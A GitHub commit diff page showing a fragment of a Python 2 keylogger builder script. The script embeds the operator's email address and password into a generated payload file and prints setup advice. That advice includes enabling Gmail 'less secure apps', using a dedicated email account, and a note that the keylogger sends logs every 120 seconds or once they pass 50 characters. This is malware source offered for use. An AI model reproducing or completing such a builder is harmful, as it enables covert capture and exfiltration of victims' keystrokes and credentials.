You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
ask=raw_input('These info above are correct? (y/n) :')
@@ -42,8 +32,6 @@ def begin():
42
32
o=template.read()
43
33
payload='#/usr/bin/python\n'
44
34
payload+='# -*- coding: utf-8 -*-\n'
45
-
payload+='GH = '+"'"+gh+"'"+'\n'
46
-
payload+='GHP = '+"'"+ghp+"'"+'\n'
47
35
payload+='EEMAIL = '+"'"+email+"'"+'\n'
48
36
payload+='EPASS = '+"'"+epass+"'"+'\n'
49
37
payload+=str(o)
@@ -98,7 +86,7 @@ def main():
98
86
raiseSystemExit
99
87
ifchoice.upper() =='K':
100
88
option()
101
-
print'\n {0}WARNING: Enable access to less secure apps on your email account.{1} \n -> RECOMMENDED: \n* GMAIL * https://www.google.com/settings/security/lesssecureapps'.format(RED, END)
89
+
print'\n {0}WARNING: Enable access to less secure apps on your email account.{2} \n -> * ONLY WORK WITH GMAIL * :\n {1}https://www.google.com/settings/security/lesssecureapps{2}'.format(RED, GREEN, END)
102
90
print'\n NOTE: Don\'t use your personal email, make a dedicated.'
103
91
print'\n {0}This keylogger send logs when logs > 50 chars or each 120 seconds.{1}'.format(BLUE, END)
0 commit comments